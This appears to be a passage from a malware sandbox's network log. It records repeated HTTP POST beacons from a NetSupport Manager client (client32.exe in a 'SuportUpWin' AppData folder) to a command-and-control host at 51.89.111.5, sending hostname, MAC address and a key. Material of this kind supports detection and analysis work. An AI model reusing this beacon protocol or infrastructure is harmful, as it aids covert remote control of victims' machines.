Nov 1, 2024 18:12:48.287545919 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:48.438872099 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:48.644079924 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:48.748061895 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:48.848054886 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:48.946839094 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:49.048062086 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:49.147854090 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:49.247879028 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:49.348826885 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:49.452076912 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:49.552057981 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:49.649971008 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:49.750838995 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:49.850878954 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:49.950875998 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:50.051860094 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:50.152877092 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:50.252845049 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49975	51.89.111.5	1771	6276	C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 18:13:21.215693951 CET	214	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 51.89.111.5Connection: Keep-AliveCMD=POLLINFO=1ACK=1 Data Raw: Data Ascii:
Nov 1, 2024 18:13:26.220182896 CET	398	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 206Host: 51.89.111.5Connection: Keep-AliveCMD=OPENCLIENT_VERSION=1.0PROTOCOL_VER=1.1MAXPACKET=928CLIENT_NAME=124406CLIENT_ADDR=>192.168.2.7PORT=5405HOSTNAME=124406MACADDRESS=ECF4BB82F7E0GSK=ODyvxTzr7zqv7L)yd6sUoQAACMPI=60APPTYPE=0DEPT= Data Raw: Data Ascii:
Nov 1, 2024 18:13:26.320008993 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:26.420967102 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:26.520984888 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:26.622081995 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:26.722290993 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:26.822994947 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:26.923018932 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:27.026395082 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:27.126444101 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:27.228177071 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:27.325031042 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:27.427469015 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:27.526014090 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:27.627710104 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:27.727121115 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:27.827019930 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:27.928112984 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:28.028117895 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:28.128062963 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:28.229211092 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:28.329231024 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:28.430008888 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:28.531013012 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:28.631998062 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:28.732011080 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:28.833204031 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:28.936157942 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:29.033039093 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:29.136151075 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:29.235748053 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:29.336149931 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:29.436162949 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:29.537657976 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:13:29.637007952 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49976	51.89.111.5	1771	6276	C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 18:14:00.453550100 CET	214	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 51.89.111.5Connection: Keep-AliveCMD=POLLINFO=1ACK=1 Data Raw: Data Ascii:
Nov 1, 2024 18:14:05.454813004 CET	398	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 206Host: 51.89.111.5Connection: Keep-AliveCMD=OPENCLIENT_VERSION=1.0PROTOCOL_VER=1.1MAXPACKET=928CLIENT_NAME=124406CLIENT_ADDR=>192.168.2.7PORT=5405HOSTNAME=124406MACADDRESS=ECF4BB82F7E0GSK=ODyvxTzr7zqv7L)yd6sUoQAACMPI=60APPTYPE=0DEPT= Data Raw: Data Ascii:
Nov 1, 2024 18:14:05.559578896 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:05.660267115 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:05.764250994 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:05.861252069 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:05.961321115 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:06.062231064 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:06.163278103 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:06.264303923 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:06.364286900 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:06.465250969 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:06.566241980 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:06.667351007 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:06.767239094 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:06.868263006 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:06.968457937 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:07.068252087 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:07.169224977 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:07.270236015 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:07.370239973 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:07.470238924 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:07.570282936 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:07.674268007 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:07.771244049 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:07.871288061 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:07.971332073 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:08.071358919 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:08.172241926 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:08.272273064 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:08.373271942 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:08.473337889 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:08.574238062 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:08.674247026 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:08.774347067 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49977	51.89.111.5	1771	6276	C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 18:14:39.414258003 CET	214	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 51.89.111.5Connection: Keep-AliveCMD=POLLINFO=1ACK=1 Data Raw: Data Ascii:
Nov 1, 2024 18:14:44.417388916 CET	398	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 206Host: 51.89.111.5Connection: Keep-AliveCMD=OPENCLIENT_VERSION=1.0PROTOCOL_VER=1.1MAXPACKET=928CLIENT_NAME=124406CLIENT_ADDR=>192.168.2.7PORT=5405HOSTNAME=124406MACADDRESS=ECF4BB82F7E0GSK=ODyvxTzr7zqv7L)yd6sUoQAACMPI=60APPTYPE=0DEPT= Data Raw: Data Ascii:
Nov 1, 2024 18:14:44.518405914 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:44.618662119 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:44.719432116 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:44.820115089 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:44.920350075 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
